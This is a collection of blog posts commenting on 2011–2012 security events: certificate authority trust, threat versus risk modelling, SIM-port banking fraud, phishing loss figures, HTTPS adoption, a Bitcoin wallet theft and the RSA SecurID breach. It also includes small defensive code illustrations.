    Now, the case for the Prosecution! On the other hand, damned spot: the CA clearly broke its promise. Out!

    In three ways did they breach the trust. Firstly, it is expressed in the Mozilla policy, and presumably in those of other vendors, that certificates are only issued to people who own/control their domains. This is no light or optional thing -- we rely on the policy because CAs and Mozilla and other vendors and auditors all routinely practice secrecy in this business.

    We *must rely on the policy* because they deny us the right to rely on anything else!

    Secondly, it is what the public believes in; it is the expectation of any purchaser or user of the product, written or not. It is a simple message, and brooks no complicated exceptions. Either your connection to your online bank is secure, and nobody else can see it, *including your employer or IT department*. Or not.

    Try explaining this exception to your grandmother, if the words do not work for you.

    Finally, the raison d'être: it is the purpose and even the entire goal of the certificate design to do exactly the opposite. The reason we have CAs like Trustwave is to stop the MITM. If they don't stop the MITM, then *we don't need the heavyweight certificate system*, we don't need CAs, and we don't need Mozilla's root list or that of any other vendor.

    We can do security much more cost-effectively if we drop the 100% always-on absolutist MITM protection.

    Given this breach of trust, what else can we trust in? Can we trust their promises that the purpose was maintained? That the cert never left the building? That secret traffic wasn't vectored in? That HSMs are worth something and audits ensure all is well in Denmark?

    That rather being the problem with trust: lie once, lose it.



    There being two views presented, it has to be said that both views are valid. The players are lining up on either side of the line, but they probably aren't so well aware of where this is going.

    Only one view is going to win out. Only one side wins this fight.

    And in so doing, in winning, the winner sows the seeds of its own destruction.

    Because if you religiously take your worldview, and look at the counter-argument to your preferred position, your thesis crumbles under its own fallacies.

    The jaws of trust just snapped shut on the players who played too long, too hard, too profitably.

    Like the financial system. We are no longer worried about the bankruptcy of one or two banks, or a few defaults by some fly specks on the map of Europe. We are now looking at a change that will ripple out and remove what vestiges of purpose and faith were left in PKI. We are now looking at all the other areas of the business that will be affected; ones that bought into the promise even though they knew they shouldn't have.

    Like the financial system, a place of uncanny similarity, each new shock makes us wonder and question. Wasn't all this supposed to be solved? Where are the experts? Where is the trust?

    We're about to find out the timeless meaning of Caveat Emptor.

    Posted by iang at 10:54 PM | Comments (7) | TrackBack

    January 29, 2012

    Why Threat Modelling fails in practice

    I've long realised that threat modelling isn't quite it.

    There's some malignancy in the way the Internet IT Security community approached security in the 1990s that became a cancer in our protocols in the 2000s. Eventually I worked out that the problem with the aphorism What's Your Threat Model (WYTM?) was the absence of a necessary first step - the business model - which lack permitted threat modelling to be de-linked from humanity without anyone noticing.

    But I still wasn't quite there, it still felt like wise old men telling me "learn these steps, swallow these pills, don't ask for wisdom."

    In my recent risk management work, it has suddenly become clearer. Taking from notes and paraphrasing, let me talk about threats versus risks, before getting to modelling.

    A threat is something that threatens, something that can cause harm, in the abstract sense. For example, a bomb could be a threat. So could an MITM, an eavesdropper, or a sniper.

    But, separating the abstract from the particular, a bomb does not necessarily cause a problem unless there is a connection to us. Literally, it has to be capable of doing us harm, in a direct sense. For this reason, the methodologists say:

    Risk = Threat * Harm

    Any random bomb can't hurt me, approximately, but a bomb close to me can. With a direct possibility of harm to us, a threat becomes a risk. The methodologists also say:

    Risk = Consequences * Likelihood

    That connection or context of likely consequences to us suddenly makes it real, as well as hurtful.

    A bomb then is a threat, but just any bomb doesn't present a risk to anyone, to a high degree of reliability. A bomb under my car is now a risk! To move from threats to risks, we need to include places, times, agents, intents, chances of success, possible failures ... *victims* ... all the rest needed to turn the abstract scariness into direct painful harm.
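
    To make the distinction concrete, a toy risk calculation - a minimal sketch, where every threat, likelihood and dollar figure is invented for illustration:

        # A threat only becomes a risk once it is tied to *us*: a likelihood
        # of hitting our assets, and consequences measured in our own terms.
        threats = {
            "random bomb, somewhere": {"likelihood": 0.0,   "consequences": 1_000_000},
            "bomb under my car":      {"likelihood": 0.001, "consequences": 1_000_000},
            "MITM on my banking":     {"likelihood": 0.01,  "consequences": 50_000},
        }

        for name, t in threats.items():
            risk = t["likelihood"] * t["consequences"]   # Risk = Consequences * Likelihood
            print(f"{name:24s} expected harm ${risk:10,.2f}")

    The first line scores zero, which is the point: the abstract bomb is a threat, but with no likelihood of reaching us, it is no risk at all.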

    We need to make it personal.

    To turn the threatening but abstract bomb from a threat to a risk, consider a plane, one which you might have a particular affinity to because you're on it or it is coming your way:

    ⇒ people dying
    ⇒ financial damage to plane
    ⇒ reputational damage to airline
    ⇒ collateral damage to other assets
    ⇒ economic damage caused by restrictions
    ⇒ war, military raids and other state-level responses

    Lots of risks! Speaking of bombs as planes: I knew someone booked on a plane that ended up in a tower -- except she was late. She sat on the tarmac for hours in the following plane.... The lovely lady called Dolly who cleaned my house had a sister who should have been cleaning a Pentagon office block, but for some reason ... not that day. Another person I knew was destined to go for coffee at ground zero, but woke up late. Oh, and his cousin was a fireman who didn't come home that day.

    Which is perhaps to say, that day, those risks got a lot more personal.

    We all have our very close stories to tell, but the point here is that risks are personal, threats are just theories.

    Let us now turn that around and consider *threat modelling*. By its nature, threat modelling deals only with threats, not risks, and it cannot therefore reach out to its users on a direct, harmful level. Threat modelling is by definition limited to theoretical, abstract concerns. It stops before it gets practical, real, personal.

    Maybe this all amounts to no more than a lot of fuss about semantics?

    To see if it matters, let's look at some examples: If we look at that old saw, SSL, we see rhyme. The threat modelling done for SSL took the rather abstract notions of CIA -- confidentiality, integrity and authenticity -- and ended up inverse-pyramiding on a rather too-perfect threat of MITM -- Man-in-the-Middle.

    We can also see, through the lens of threat analysis versus risk analysis, that the notion of creating a protocol to protect any connection - an explicit choice of the designers - left them unable to do any risk analysis at all; the notion of protecting certain assets, such as the credit cards mentioned in the advertising blurb, was therefore conveniently not part of the analysis (which we knew, because any risk analysis of credit cards reveals different results).

    Threat modelling therefore reveals itself to be theoretically sound but not necessarily helpful. It is then no surprise that SSL performed perfectly against its chosen threats, but did little to fend off the risks that users actually face. Indeed, arguably, as much as it stopped some risks, it helped other risks to proceed in their natural evolution. Because SSL dealt perfectly with all its chosen threats, it ended up providing a false sense of security against the harm-incurring risks (remember SSL & Firewalls?).

    OK, that's an old story, and maybe completely and boringly familiar to everyone else? What about the rest? What do we do to fix it?

    The challenge might then be to take Internet protocol design from the very plastic, perfect but random tendency of threat modelling and move it forward to the more haptic, consequences-directed chaos of risk modelling.

    Or, in other words, we've got to stop conflating threats with risks.

    Critics can rush forth and grumble, and let me be the first: Moving to risk modelling is going to be hard, as any Internet protocol at least at the RFC level is generally designed to be deployed across an extremely broad base of applications and users.

    Remember IPSec? Do you feel the beat? This might be the reason why we say that only end-to-end security cuts the mustard: because end-to-end implies an application, and this draws in the users, permitting us to do real risk modelling.

    It might then be impossible to do security at the level of an Internet-wide, application-free security protocol, a criticism that isn't new to the IETF. Recall the old ISO layer 5, sometimes called "the security layer"?

    But this doesn't stop the conclusion: threat modelling will always fail in practice, because by definition, threat modelling stops before practice. The place where users are being exposed and harmed can only be investigated by getting personal - by including your users in your model. Threat modelling does not go that far; it does not consider the risks against any particular set of users that will be harmed by those risks in full flight. Threat modelling stops at the theoretical, and must by the law of ignorance fail in the practical.

    Risks are where harm is done to users. Risk modelling therefore is the only standard of interest to users.

    Posted by iang at 02:02 PM | Comments (6) | TrackBack

    January 21, 2012

    for bright times for CISOs ... turn on the light!

    Along the lines of "The CSO should have an MBA" we have some progress:

    City University London will offer a new postgraduate course from September, designed to help information security and risk professionals progress to managerial roles.

    The new Masters in Information Security and Risk (MISR) aims to address a gap in the market for IT professionals that can “speak business”. One half of the course is devoted to security strategy, risk management and security architecture, while the other half focuses on putting this into a business-oriented context.

    “Talking to people out in the industry, particularly if you go to the financial sector, they say one real problem is they don't have a security person who they can take along to the board meeting without having to act as an interpreter; so we're putting together a programme to address this need,” explained course director Professor Kevin Jones, speaking at the Infosecurity Europe Press Conference in London yesterday.

    Posted by iang at 04:48 AM | Comments (0) | TrackBack

    December 08, 2011

    Two-channel breached: a milestone in threat evaluation, and a floor on monetary value

    Readers will know we first published the account of "Man in the Browser" by Philipp Gühring way back when, and followed it up with news that the way forward was dual-channel transaction signing. In short, this meant the bank sending an SMS to your handy mobile cell phone with the transaction details, and a check code to enter if you wanted the transaction to go through.
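
    For flavour, here is the core of the signing side - a minimal sketch in Python, where the message format, key handling and six-digit truncation are my assumptions, not any particular bank's scheme:

        import hashlib
        import hmac

        def transaction_code(key: bytes, account: str, amount_cents: int, payee: str) -> str:
            """Derive a short check code bound to the exact transaction details."""
            message = f"{account}|{amount_cents}|{payee}".encode()
            digest = hmac.new(key, message, hashlib.sha256).digest()
            return f"{int.from_bytes(digest[:4], 'big') % 1_000_000:06d}"

        # The bank SMSes the code plus the details to the phone; the user checks
        # the details and types the code into the browser. A trojan that alters
        # the payee in the browser produces a mismatch - unless it owns the phone too.
        key = b"per-customer secret held by the bank"   # illustrative only
        print(transaction_code(key, "12-3456", 4_500_000, "Electronics Retailer"))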

    On the face of it, pretty secure. But at the back of our minds, we knew that this was just an increase in difficulty: a crook could seek to control both channels. And so it comes to pass:

    In the days leading up to the fraud being committed, [Craig] had received two strange phone calls. One came through to his office two-to-three days earlier, claiming to be a representative of the Australian Tax Office, asking if he worked at the company. Another went through to his home number when he was at work. The caller claimed to be a client seeking his mobile phone number for an urgent job; his daughter gave out the number without hesitation.

    The fraudsters used this information to make a call to Craig’s mobile phone provider, Vodafone Australia, asking for his phone number to be “ported” to a new device.

    As the port request was processed, the criminals sent an SMS to Craig purporting to be from Vodafone. The message said that Vodafone was experiencing network difficulties and that he would likely experience problems with reception for the next 24 hours. This bought the criminals time to commit the fraud.

    The unintended consequence of the phone being used for transaction signing is that the phone is now worth maybe as much as the fraud you can pull off. Assuming the crooks have already cracked the password for the bank account (something probably picked up on a market for pennies), the crooks are now ready to spend substantial amounts of time to crack the phone. In this case:

    Within 30 minutes of the port being completed, and with a verification code in hand, the attackers were spending the $45,000 at an electronics retailer.

    Thankfully, the abnormally large transaction raised a red flag within the fraud unit of the Commonwealth Bank before any more damage could be done. The team tried – unsuccessfully – to call Craig on his mobile. After several attempts to contact him, Craig’s bank account was frozen. The fraud unit eventually reached him on a landline.

    So what happens now that the crooks walked with $45k of juicy electronics (probably convertible to cash at 50-70% off face over ebay)?

    As is standard practice for online banking fraud in Australia, the Commonwealth Bank has absorbed the hit for its customer and put $45,000 back into Craig's account.

    A NSW Police detective contacted Craig on September 15 to ensure the bank had followed through with its promise to reinstate the $45,000. With this condition satisfied, the case was suspended on September 29 pending the bank asking the police to proceed with the matter any further.

    One local police investigator told SC that in his long career, a bank has only asked for a suspended online fraud case to be investigated once. The vast majority of cases remain suspended. Further, SC Magazine was told that the police would, in any case, have to weigh up whether it has the adequate resources to investigate frauds involving such small amounts of money.

    No attempt was made at a local police level to escalate the Craig matter to the NSW Police Fraud and Cybercrime squad, for the same reasons.

    In a paper I wrote in 2008, I stated that for some value below X, the police wouldn't lift a finger. The Prosecutor has too much important work to do! What we have here is a very definite floor, below which Internet systems that transmit and protect value are unable to rely on external resources such as the law. Reading more:

    But the Commonwealth Bank claims it has forwarded evidence to the NSW and Federal Police forces that could have been used to prosecute the offenders.

    The bank’s fraud squad – which had identified the suspect transactions within minutes of the fraud being committed - was able to track down where the criminals spent the stolen money.

    A spokesman for the bank said it “dealt with both Federal and State (NSW) Police regarding the incident” and that “both authorities were advised on the availability of CCTV footage” of the offenders spending their ill-gotten gains.

    “The Bank was advised by one of the authorities that the offender had left the country – reducing the likelihood of further action by that authority,” the spokesperson said.

    This number goes up dramatically once we cross a border. In that paper I suggested $25k; here we have a reported number of $45k.

    Why is that important? Because some systems have implicit guarantees that go like "we do blah and blah and blah, and then you go to the police and all your problems are solved!" Sorry, not if it is too small - where small is surprisingly large. Any such system that handwaves you to the police without clearly indicating the floor of interest ... is probably worthless.

    So when would you trust a system that backstopped to the police? I'll stick my neck out and say, if it is beyond your borders, and you're risking >> $100k, then you might get some help. Otherwise, don't bet your money on it.

    Posted by iang at 04:34 PM | Comments (5) | TrackBack

    October 26, 2011

    Phishing doesn't really happen? It's too small to measure?

    Two Microsoft researchers have published a paper pouring scorn on claims cyber crime causes massive losses in America. They say it’s just too rare for anyone to be able to calculate such a figure.

    Dinei Florencio and Cormac Herley argue that samples used in the alarming research we get to hear about tend to contain a few victims who say they lost a lot of money. The researchers then extrapolate that to the rest of the population, which gives a big total loss estimate – in one case of a trillion dollars per year.

    But if these victims are unrepresentative of the population, or exaggerate their losses, they can really skew the results. Florencio and Herley point out that one person or company claiming a $50,000 loss in a sample of 1,000 would, when extrapolated, produce a $10 billion loss for America as a whole. So if that loss is not representative of the pattern across the whole country, your total could be $10 billion too high.
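
    The arithmetic is worth seeing once - a quick sketch, with the 200-million scaling base as my own round-number assumption:

        sample_size = 1_000
        population = 200_000_000        # rough US adult population, assumed for scale

        outlier_claim = 50_000          # one respondent reports a $50,000 loss
        per_head = outlier_claim / sample_size   # $50 of "average" loss per head
        estimate = per_head * population         # scales up to $10 billion
        print(f"${estimate:,.0f}")      # one unrepresentative answer moves the total $10bn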

    Having read the paper, the above is about right. And sufficient description, as the paper goes on for pages and pages making the same point.

    Now, I've also been skeptical of the phishing surveys. So, for a long time, I've just stuck to the number of "about a billion a year." And waited for someone to challenge me on it :) Most of the surveys seemed to head in that direction, and what we would hope for would be more useful numbers.

    So far, Florencio and Herley aren't providing those numbers. The closest I've seen is the FBI-sponsored report that derives from reported fraud rather than surveys. That seems to point in the direction of 10 billion a year for all identity-related consumer frauds, with a sort of handwavy claim that there is a ratio of 10:1 between all fraud and Internet-related fraud.

    I wouldn't be surprised if the number was really 100 million. But that's still a big number. It's still bigger than the income of Mozilla, which makes the #2 browser by numbers. It's still bigger than the budget of the Anti-Phishing Working Group, an industry-sponsored private thinktank. And CABForum, another industry-only group.

    So who benefits from inflated figures? The media, because of the scare stories, and the public and private security organisations and businesses who provide cyber security. The above parliamentary report indicated that in 2009 Australian businesses spent between $1.37 and $1.95 billion in computer security measures. So on the report’s figures, cyber crime produces far more income for those fighting it than those committing it.

    Good question from the SMH. The answer is that it isn't in any player's interest to provide better figures. If so (and we can see support for this in the Silver Bullets structure), what is Florencio and Herley's intent in popping the balloon? They may be academically correct in trying to deflate the security market's obsession with measurable numbers, but without some harder numbers of their own, one wonders: what's the point?

    What is the real number? Florencio and Herley leave us dangling at that point. Are they setting up to provide those figures one day? If those aren't forthcoming, I fear the paper is destined to be just more media fodder, as its salacious title suggests. Iow, pointless.

    Hopefully numbers are coming. In an industry steeped in Numerology and Silver Bullets, facts and hard numbers are important. Until then, your rough number is as good as mine -- a billion.

    Posted by iang at 05:05 PM | Comments (2) | TrackBack

    October 23, 2011

    HTTPS everywhere: Google, we salute you!

    Google radically expanded Tuesday its use of bank-level security that prevents Wi-Fi hackers and rogue ISPs from spying on your searches.

    Starting Tuesday, logged-in Google users searching from Google’s homepage will be using https://google.com, not http://google.com — even if they simply type google.com into their browsers. The change to encrypted search will happen over several weeks, the company said in a blog post Tuesday.


    We have known for a long time that the answer to web insecurity is this: There is only one mode, and it is secure.

    (I use the royal we here!)

    This is evident in breaches led by phishing, as the users can't see the difference between HTTP and HTTPS. The only solution at several levels is to get rid of HTTP. Entirely!

    Simply put, we need SSL everywhere.
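
    In deployment terms, the first step is mechanical: refuse to serve plain HTTP, and redirect everything to its HTTPS twin. A minimal sketch (the port is a placeholder; a real site would do this in the web server config, and set Strict-Transport-Security on the HTTPS side so browsers stop trying HTTP at all):

        from http.server import BaseHTTPRequestHandler, HTTPServer

        class RedirectAllToHTTPS(BaseHTTPRequestHandler):
            """Answer every plain-HTTP request with a permanent redirect to HTTPS."""
            def do_GET(self):
                host = self.headers.get("Host", "example.com").split(":")[0]
                self.send_response(301)
                self.send_header("Location", f"https://{host}{self.path}")
                self.end_headers()
            do_POST = do_GET   # don't serve form posts over plain HTTP either

        if __name__ == "__main__":
            HTTPServer(("", 8080), RedirectAllToHTTPS).serve_forever()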

    Google are seemingly the only big corporate that have understood and taken this message to heart.

    Google has been a leader in adding SSL support to cloud services. Gmail is now encrypted by default, as is the company’s new social network, Google+. Facebook and Microsoft’s Hotmail make SSL an option a user must choose, while Yahoo Mail has no encryption option, beyond its initial sign-in screen.

    EFF and CAcert are small organisations that are doing it as and when we can... Together, security-conscious organisations are slowly migrating all their sites to SSL and HTTPS all the time.

    It will probably take a decade. Might as well start now -- where's your organisation's commitment to security? Amazon, Twitter, Yahoo? Facebook!

    Posted by iang at 05:24 AM | Comments (2) | TrackBack

    October 13, 2011

    Founders of SSL call game over?

    RSA's Coviello declares the new threat environment:

    "Organisations are defending themselves with the information security equivalent of the Maginot Line as their adversaries easily outflank perimeter defences," Coviello added. "People are the new perimeter contending with zero-day malware delivered through spear-phishing attacks that are invisible to traditional perimeter-based security defences such as antivirus and intrusion detection systems." ®

    The recent spate of attacks does not tell us that the defences are weak - that is something we've known for some time. E.g., from 20th April, 2003, "The Maginot Web" said it. Yawn. Taher Elgamal, the guy who did the crypto in SSL at Netscape back in 1994, puts it this way:

    How about those certificate authority breaches against Comodo and that wiped out DigiNotar?

    It's a combination of PKI and trust models and all that kind of stuff. If there is a business in the world that I can go to and get a digital certificate that says my name is Tim Greene then that business is broken, because I'm not Tim Greene, but I've got a certificate that says this is my name. This is a broken process in the sense that we allowed a business that is broken to get into a trusted circle. The reality is there will always be crooks, somebody will always want to make money in the wrong way. It will continue to happen until the end of time.

    Is there a better way than certificate authorities?

    The fact that browsers were designed with built-in root keys is unfortunate. That is the wrong thing, but it's very difficult to change that. We should have separated who is trusted from the vendor. ...

    What the recent rash of exploits signals is that the attackers are now lined up and deployed against our weak defences:

    Coviello said one of the ironies of the attack was that it validated trends in the market that had prompted RSA to buy network forensics and threat analysis firm NetWitness just before the attack.

    This is another unfortunate hypothesis in the market for silver bullets: we need real attacks to tell us real security news. OK, now we've got it. Message heard, loud and clear. So, what to do? Coviello goes on:

    Security programs need to evolve to be risk-based and agile rather than "conventional" reactive security, he argued.

    "The existing perimeter is not enough, which is why we bought NetWitness. The NetWitness technology allowed us to determine damage and carry out remediation very quickly," Coviello said.


    The existing perimeter was an old idea - one static defence, and the attacker would walk up, hit it with his head, and go elsewhere in confusion. Build it strong, went the logic, and give the attacker a big headache! ... but the people in charge at the time were steeped in the school of cryptology and computer science, and consequently lacked the essential visibility over the human aspects of security to understand how limiting this concept was, and how the attacker was blessed with sight and an ability to walk around.

    Risk management throws out the old binary approach completely. To some extent, it is just in time, as a methodology. But to a large extent, the market place hasn't moved. Like deer in headlights, the big institutions watch the trucks approach, looking at each other for a solution.

    Which is what makes these comments by RSA and Taher Elgamal significant. More than others, these people built the old SSL infrastructure. When the people who built it call game over, it's time to pay attention.

    Posted by iang at 10:31 AM | Comments (5) | TrackBack

    August 01, 2011

    A tale of phishers, CAs, vendors and losers: I've come to eat your babies!

    We've long documented the failure of PKI and secure browsing to be an effective solution to security needs. Now comes spectacular proof: sites engaged in carding, which is the trading of stolen credit card information, have always protected their trading sites with SSL certs of the self-signed variety. According to a brief, informal search by Peter Gutmann across 'a bunch of generic "sell CVV", "fullz", "dumps" ones,' some of the CAs are now issuing certificates to carders.

    This amounts to a new juvenile culinary phase in the target-rich economy of cyber-crime:

    Phisher: I've come to eat your babies!
    CA: Oh, yes, you'll be needing a certificate for that, $200 thanks!

    Although the search was not scientifically conducted or verified, both Mozilla and the CA concerned indicated that the criminals can have their certs and eat them too. As long as they follow the same conditions as everyone else, that's fine.

    Except, it's not. Firstly, it's against the law in almost all places to aid & abet a criminal. As Blackstone put it (ex Wikipedia):

    "AN accessory after the fact may be, where a person, knowing a felony to have been committed, receives, relieves, comforts, or assists the felon.17 Therefore, to make an accessory ex post facto, it is in the first place requisite that he knows of the felony committed.18 In the next place, he must receive, relieve, comfort, or assist him. And, generally, any assistance whatever given to a felon, to hinder his being apprehended, tried, or suffering punishment, makes the assistor an accessory. As furnishing him with a horse to escape his pursuers, money or victuals to support him, a house or other shelter to conceal him, or open force and violence to rescue or protect him."

    The point here made by Blackstone, and translated into the laws of many lands is that the assistance given is not specific, but broad. If we are in some sense assisting in the commission of the crime, then we are accessories. For which there are penalties.

    And, these penalties are as if we were the criminals. For those who didn't follow the legal blah blah above, the simple thing is this: it's against the law. Go to jail, do not pass go, do not collect $200.

    Secondly, consider the security diaspora. Users were hoping that browsers such as Firefox, IE, etc, would protect them from phishing. The vendors' position, policy-wise and code-wise, is that their security mechanism to protect users from phishing is to provide PKI certificates, which might evidence some level of verification of your counter-party. This reduces to a single statement: if you are ripped off by someone who uses a cert against you, you might know something about them.

    This protection is (a) ineffective against phishing, as shown every time a phisher downgrades HTTPS to HTTP, (b) now shared & available equally to the phishers themselves to assist them in their crime, and (c) apparently judged by the phishers to be worth having: the protection offered by encryption against their enemies outweighs the legal threat of some identity being revealed to those enemies. Users lose.

    In open list on Mozilla's forum, the CA concerned saw no reason to address the situation. Other CAs also seem to issue to equally dodgy sites, so it's not about one CA. The general feeling in the CA-dominated sector is that identity within the cert is sufficient reason to establish a reasonable security protection, notwithstanding that history, logic, evidence and now the phishers themselves show such a claim is about as reasonable and efficacious as selling recipes for marinated babies.

    It seems Peter and I stand alone. In some exasperation, I consulted with Mozilla directly. To little end; Mozilla also believe that the phishing community are deserving of certificates, they simply have to ask a CA to be invited into our trusted inner-nursery. I've no doubt that the other vendors will believe and maintain the same, an approach to legal issues sometimes known as the ostrich strategy. The only difference here being that Mozilla maintains an open forum, so it can be embarrassed into a private response, whereas CAs and other vendors can be embarrassed into silence.

    Posted by iang at 06:13 PM | Comments (0) | TrackBack

    June 14, 2011

    BitCoin - the bad news

    Predictions based on theory have been presented. Not good. BitCoin will fundamentally be a bad money because it will be too volatile, according to the laws of economics. You can't price goods in a volatile unit. Rated for speculation only, bubble territory, and quite reasonably likened to a ponzi scheme (if not exactly a ponzi scheme, with a nod to Patrick). Sorry folks, the laws of economics know no bribes, favours, demands.

    And so theory comes to practice:

    Bitcoin slump follows senators’ threats - Correlation or causation?

    By Richard Chirgwin.

    As any investment adviser will tell you, it’s a bad idea to put all your eggs in one basket. And if Rick Falkvinge was telling the truth when he said all his savings were now in Bitcoin, he’s been taken down by a third in a day.

    Following last week’s call by US senators for an investigation into virtual crypto-currency Bitcoin, its value is slumping.

    According to DailyTech, Bitcoins last Friday suffered more than 30 percent depreciation in value – a considerable fall given that the currency’s architecture is designed to inflate its value over time.

    The slump could reflect a change in attitude among holders of Bitcoins: if the currency were to become less attractive to pay for illegal drugs, then dealers and their customers would dump their Bitcoins in favour of some other medium.

    Being dumped by PayPal won’t have helped either. As DailyTech pointed out, PayPal has a policy against virtual currencies, so by enforcing the policy, PayPal has made it harder to trade Bitcoins.

    The threat of regulation may also have sent shivers down Bitcoin-holders’ spines. The easiest regulatory action – although requiring international cooperation – would be to regulate, shut down or tax Bitcoin exchanges such as the now-famous Mt Gox. However, a sufficient slump may well have the same effect as a crackdown: whether Mt Gox is a single speculator or a group of traders, it’s unlikely to have the kind of backing (or even, perhaps, the hedging) that enables “real” currency traders to survive sharp swings in value.
    ......

    Then the problem of a bubble in digital cash is compounded by theft:


    I just got hacked - any help is welcome!

    Hi everyone. I am totally devastated today. I just woke up to see a very large chunk of my bitcoin balance gone to the following address:

    1KPTdMb6p7H3YCwsyFqrEmKGmsHqe1Q3jg

    Transaction date: 6/13/2011 12:52 (EST)

    I feel like killing myself now. This get me so f'ing pissed off. If only the wallet file was encrypted on the HD. I do feel like this is my fault somehow for now moving that money to a separate non windows computer. I backed up my wallet.dat file religiously and encrypted it but that does not do me much good when someone or some trojan or something has direct access to my computer somehow.

    The dude lost 25,000 BTC which at recent "valuations" on the exchange I calculate as $250,000 to $750,000.

    Yeah. When we were building digital cash systems we were *very conscious* that the weak link in the entire process was the user's PC. We did two things: we chose nymous, directly accounted transactions, so that we could freeze the whole thing if we needed to, and we intended to go for secure platforms for large values. Those secure platforms are now cheaply available (they weren't then).
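    As an aside, encrypting a wallet at rest is not hard -- though, as the victim himself observes, it only defends the file on disk, not a live machine already owned by a trojan. A sketch of one way to do it, assuming the third-party pyca `cryptography` package (the file name and passphrase are illustrative):

        # Encrypt a wallet file at rest with a passphrase-derived key.
        # Sketch only: protects the file on disk, not a running machine.
        import base64, hashlib, os
        from cryptography.fernet import Fernet  # third-party: pyca/cryptography

        def key_from_passphrase(passphrase, salt):
            # scrypt is deliberately slow, to make passphrase guessing expensive
            raw = hashlib.scrypt(passphrase, salt=salt, n=2**14, r=8, p=1, dklen=32)
            return base64.urlsafe_b64encode(raw)

        def encrypt_file(path, passphrase):
            salt = os.urandom(16)
            token = Fernet(key_from_passphrase(passphrase, salt)).encrypt(
                open(path, "rb").read())
            with open(path + ".enc", "wb") as f:
                f.write(salt + token)   # store salt alongside the ciphertext

        def decrypt_file(path, passphrase):
            blob = open(path, "rb").read()
            salt, token = blob[:16], blob[16:]
            return Fernet(key_from_passphrase(passphrase, salt)).decrypt(token)

        # given an existing wallet.dat on disk:
        encrypt_file("wallet.dat", b"correct horse battery staple")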

    BitCoin went too fast. Now people are learning the lessons.

    (Note the above link is no longer working. Luckily I had it cached. I'm not attesting to its accuracy, just its relevance to the debate.)


    Also: For those who can stomach more bad news...
    1. Bitcoin and tulip bulbs
    2. Is BitCoin a triple entry system?
    3. BitCoin - the bad news

    Posted by iang at 10:51 AM | Comments (1) | TrackBack

    June 07, 2011

    RSA Pawned - Black Queen runs amok behind US lines of defence

    What to learn from the RSA SecureID breach?

    RSA has finally admitted publicly that the March breach into its systems has resulted in the compromise of their SecurID two-factor authentication tokens.

    Which points to:

    In a letter to customers Monday, the EMC Corp. unit openly acknowledged for the first time that intruders had breached its security systems at defense contractor Lockheed Martin Corp. using data stolen from RSA.

    It's a targeted attack across multiple avenues. This is a big shift in the attack profile, and it is perhaps the first serious evidence of the concept of Advanced Persistent Threats (APTs).

    What went wrong at the institutional level? Perhaps something like this:

    • A low-threat environment in the 1990s
    • led to the success of the low-threat SecurID token
    • (based on a non-diversified model that sourced back to a single company),
    • which peace in our time translated to a lack of desire to evolve in the 2000s,
    • and the industry grew to love "best practices with a vengeance" as everyone from finance to defence relied on the same approach,
    • and domination in secure tokens by one brand-name supplier.
    • Meanwhile, we watched the evolution of attack scenarios, rolling on through the phishing and breaches pincer movement of the early 2000s up to the APTs of now,
    • while any thought & leadership in the security industry withered and died.

    So, with a breach in the single-point-of-failure, we are looking at an industry-wide replacement of all 40 million SecurID tokens.

    Which presumably will be a fascinating exercise, and one from which we should be able to learn a lot. It isn't often that we see a SPOF event, and it's a chance to learn just what impact a single point of failure has:

    The admission comes in the wake of cyber intrusions into the networks of three US military contractors: Lockheed Martin, L-3 Communications and Northrop Grumman - one of them confirmed by the company, others hinted at by internal warnings and an unusual domain name and password reset process

    But one would also be somewhat irresponsible not to ask: what happens next? Simply replacing the SecurID fobs and resetting the secret sauce at RSA does not seem to satisfy as *a solution*, although we can understand that a short-term hack might be needed.

    Chief (Information) Security Officers everywhere will probably be thinking that we need a little more re-thinking of the old 1990s models. Good luck, guys! You'll probably need a few more breaches to wake up the CEOs, so you can get the backing you need to go beyond "best practices" and start doing the job seriously.
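    A toy illustration of why a stolen seed file is game over, in the style of the open TOTP standard (RFC 6238). SecurID's actual algorithm is proprietary and differs in detail, so treat this as an analogy, not a description of RSA's scheme: the code is a pure function of seed and clock, so whoever copies the seed database can compute every code every token will ever display.

        # Toy time-based OTP, TOTP-style. The point: the output is a pure
        # function of (seed, clock), so stealing the vendor's seed file
        # steals every future code for every token at once.
        import hmac, hashlib, struct, time

        def otp(seed, t=None, step=60):
            counter = int(time.time() if t is None else t) // step
            mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
            offset = mac[-1] & 0x0F   # RFC 4226 dynamic truncation
            code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
            return "%06d" % (code % 10**6)

        # The token and the attacker holding the stolen seed agree, forever:
        seed = b"per-token secret, also on file at the vendor"  # hypothetical
        print(otp(seed), "==", otp(seed))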


    In contrast, the very next post discusses where we're at when we fail to meet "best practices!"

    Posted by iang at 11:45 AM | Comments (4) | TrackBack

    May 20, 2011

    Hold the press! Corporates say that SSL is too slow to be used all the time?

    Google researchers say they've devised a way to significantly reduce the time it takes websites to establish encrypted connections with end-user browsers, a breakthrough that could make it less painful for many services to offer the security feature. ....

    The finding should come as welcome news to those concerned about online privacy. With the notable exceptions of Twitter, Facebook, and a handful of Google services, many websites send the vast majority of traffic over unencrypted channels, making it easy for governments, administrators, and Wi-Fi hotspot providers to snoop or even modify potentially sensitive communications while in transit. Companies such as eBay have said it's too costly to offer always-on encryption.

    The Firesheep extension introduced last year for the Firefox browser drove home just how menacing the risk of unencrypted websites can be.

    Is this a case of, NIST taketh away what Google granteth?

    Posted by iang at 12:25 PM | Comments (3) | TrackBack

    March 30, 2011

    Revising Top Tip #2 - Use another browser!

    It's been a long time since I wrote up my Security Top Tips, and things have changed a bit since then. Here's an update. (You can see the top tips about half way down on the right menu block of the front page.)

    Since then, browsing threats have got a fair bit worse. Although browsers have done some work to improve things, their overall efforts have not really resulted in any impact on the threats. Worse, we are now seeing MITBs (man-in-the-browser attacks) being experimented with, and many more attackers getting in on the act.

    To cope with this heightened risk to our personal node, I experimented a lot with using private browsing, cache clearing, separate accounts and so forth, and finally hit on a fairly easy method: Use another browser.

    That is, use something other than the browser that one uses for browsing. I use Firefox for general stuff, and for a long time I've been worried that it doesn't really do enough in the battle for my user security. Safari is also loaded on my machine (thanks to Top Tip #1). I don't really like using it, as its interface is a little bit weaker than Firefox (especially the SSL visibility) ... but in this role it does very well.

    So for some time now, for all my online banking and similar usage, I have been using Safari. These are my actions:

    • I start Safari up
    • click on Safari / Private Browsing
    • use google or memory to find the bank
    • inspect the URL and head in.
    • After my banking session I shut down Safari.

    I don't use bookmarks, because that's an easy place for a trojan to look (I'm not entirely sure of that technique but it seems like an obvious hint).

